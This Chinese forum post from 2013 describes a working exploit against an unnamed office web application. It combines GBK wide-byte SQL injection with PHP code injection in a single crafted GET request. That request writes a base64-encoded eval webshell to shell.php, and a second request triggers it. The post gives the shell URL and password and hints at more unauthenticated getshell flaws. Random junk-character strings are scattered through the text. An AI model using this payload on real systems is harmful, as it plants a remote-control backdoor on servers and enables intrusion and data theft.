此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了., i: ]: Q, {4 m! h
* J x5 Y/ C7 q7 v4 ]" n
5 @* l$ Y- X0 c. K: YEXP:$ w/ p9 o9 w. g' O9 K H
: P2 b- M8 M, S& c* I第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
9 e) y2 [7 z9 ~8 g4 ` $ a3 K' m; ?; l8 S2 v7 l5 ]
第二步: [GET]http://site/general/email/index.php8 m6 f, X/ d! x9 [3 o' T' z9 _
; E! m7 h% C. w* R7 I5 J. r
SHELL: http://site/general/email/shell.php 密码C% F- k) V; D( ~6 s
" m) u% K9 a5 B: m( y
: e: R$ G* K# M% X; V此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好, x: H2 i6 G, p5 L5 j! ^/ u
" [0 S% c( A+ q2 [; Y, l
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
7 i; z$ R' t8 T$ J& H+ {0 Z$ p+ g. `$ r% w. G- B& X
& u% n. r4 D" t& b% x" ?
|
发表于 2013-2-4 16:19:29
收藏
支持
反对